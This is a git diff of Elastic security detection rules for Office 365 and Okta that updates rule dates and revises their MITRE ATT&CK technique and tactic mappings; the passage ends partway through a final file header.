index 42f4af5cf54..36613ec061d 100644 --- a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml b/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml index 60c6d104619..a059221e92f 100644 --- a/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml +++ b/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["o365"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,17 +106,36 @@ web where event.dataset == "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.008" name = "Clear Mailbox Data" reference = "https://attack.mitre.org/techniques/T1070/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml index 7b81c5b2bd0..8d5e9e22b20 100644 --- a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml +++ b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/27" integration = ["o365"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -107,10 +107,17 @@ event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" @@ -120,4 +127,3 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml index 98575d9075a..9353dbcbee6 100644 --- a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml +++ b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,14 +80,18 @@ o365.audit.NewValue:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml index a83611522d5..570299d5b44 100644 --- a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml +++ b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,14 +78,18 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml index cc943708bc7..b236dee5b22 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,14 +78,31 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique.subtechnique]] +id = "T1114.003" +name = "Email Forwarding Rule" +reference = "https://attack.mitre.org/techniques/T1114/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml index ed1b40e8736..8ab9e702ec7 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,14 +79,31 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml b/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml index 2a6f4711e02..3cd8b3f6c63 100644 --- a/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml +++ b/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/15" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -86,14 +86,23 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1486" name = "Data Encrypted for Impact" reference = "https://attack.mitre.org/techniques/T1486/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml index f38c9c8e7ab..0ce83d4a339 100644 --- a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml +++ b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/04" integration = ["o365"] maturity = "production" -updated_date = "2025/10/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,22 +93,39 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml index 50995758898..a593f424e70 100644 --- a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/24" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,34 +102,47 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml index f97a3f4fe2b..72c07c33077 100644 --- a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -141,29 +141,46 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml index bf11a1e50c2..f448ef4d4f1 100644 --- a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml +++ b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -103,27 +103,49 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + +[[rule.threat.technique]] +id = "T1606" +name = "Forge Web Credentials" +reference = "https://attack.mitre.org/techniques/T1606/" + +[[rule.threat.technique.subtechnique]] +id = "T1606.002" +name = "SAML Tokens" +reference = "https://attack.mitre.org/techniques/T1606/002/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId", "o365.audit.ErrorNumber"] diff --git a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml index 1768e604eac..6a188c194de 100644 --- a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml +++ b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,36 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml index 3618f364ed9..bb5accb60cd 100644 --- a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml +++ b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,18 +84,36 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml index 71b93df4cac..268f01b506b 100644 --- a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml +++ b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -116,22 +116,39 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.002" name = "Additional Email Delegate Permissions" reference = "https://attack.mitre.org/techniques/T1098/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.002" +name = "Additional Email Delegate Permissions" +reference = "https://attack.mitre.org/techniques/T1098/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId"] diff --git a/rules/integrations/o365/persistence_teams_guest_access_enabled.toml b/rules/integrations/o365/persistence_teams_guest_access_enabled.toml index ef65532a6c5..7e3c706e1f9 100644 --- a/rules/integrations/o365/persistence_teams_guest_access_enabled.toml +++ b/rules/integrations/o365/persistence_teams_guest_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,14 +78,26 @@ o365.audit.Parameters.AllowGuestUser:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml index 6b821fb7bfe..51e1c706f72 100644 --- a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml +++ b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -83,19 +83,36 @@ event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml index e354d1a2bfa..6ba483860a8 100644 --- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml +++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/02" integration = ["o365"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -87,34 +87,18 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml index a7c2689ef36..5d362666fe7 100644 --- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml +++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,14 +81,31 @@ event.dataset:okta.system and event.action:user.mfa.attempt_bypass [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1111" name = "Multi-Factor Authentication Interception" reference = "https://attack.mitre.org/techniques/T1111/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml index 0c7a8ec869e..e7ef9688ee1 100644 --- a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml +++ b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] @@ -79,17 +79,26 @@ event.dataset:okta.system and event.action:user.account.lock [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["okta.actor.alternate_id"] value = 3 diff --git a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml index 032c715eb49..9480d17099e 100644 --- a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml +++ b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/10" integration = ["okta"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,32 +92,44 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" [[rule.threat.technique.subtechnique]] id = "T1110.004" name = "Credential Stuffing" reference = "https://attack.mitre.org/techniques/T1110/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.threshold] field = ["okta.debug_context.debug_data.dt_hash"] value = 1 diff --git a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml index 03486d8b6ad..46a0131cce9 100644 --- a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml +++ b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/08" integration = ["okta"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,14 +107,31 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1539/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml index 208243ef930..49f0b900a26 100644 --- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml +++ 